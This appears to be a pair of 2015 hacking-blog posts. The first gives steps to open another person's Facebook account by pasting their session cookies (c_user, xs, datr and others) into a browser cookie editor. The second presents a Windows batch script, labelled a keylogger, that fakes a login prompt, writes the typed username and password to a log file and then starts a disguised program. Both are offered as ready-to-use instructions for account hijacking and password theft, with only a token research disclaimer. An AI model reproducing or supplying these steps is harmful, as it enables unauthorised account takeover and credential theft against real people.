Thursday 14 May 2015

OPEN others facebook using cookies:::::::::

open facebook using cookies 

download mozila firefox cookies manager click here  cookies edit
download google chrome cookies manager click here cookies edit

step 1 - cookies edit is add in you browser add ons
now open your cookies editor ....

mozila firefox user >>>> tool > click cookies manager
google chrome user >>>> click right boutton and click cookies editor
step 2 - now again 
step 3 - again and again put all cookies data in cookies manager 
datr
lu
fr 
locale
xs
c_user
act
sub

step 4 - now click on reload button ... now u open facebook using cookies .




 

Saturday 2 May 2015

How to make KeyLogger in Notepad

Keyloggers, a tool used to access what is being typed on your computer, is the first item you use for getting passwords! 
Actually keyloggers are widely used and you don't know whether the website on which you are putting your data has a keylogger script on it or not. Here's an article by me on How to make a simple  Keylogger on Notepad.

This script teaches you the basics of how keylogging works in notepad. This script should be used for research purposes only.

@echo off
color a
title Login
cls
echo Please Enter Email Adress And Password
echo.
echo.
cd "C:\Logs"
set /p user=Username:
set /p pass=Password:
echo Username="%user%" Password="%pass%" >> Log.txt
start >>Program Here<<
exit

1.) Now paste the above code into Notepad and save it as a Logger.bat file.

2.) Make a new folder on the desktop and name it Logs (If the folder is not called Logs, then it will not work.

3.) Drag that folder in to the C:\

4.) Test out the Logger.bat!

5.) Alright, now once you test it, you will go back into the Logs folder in the C:\And a .txt file will be in there, [if you make a second entry, the .txt file will overwrite itself.]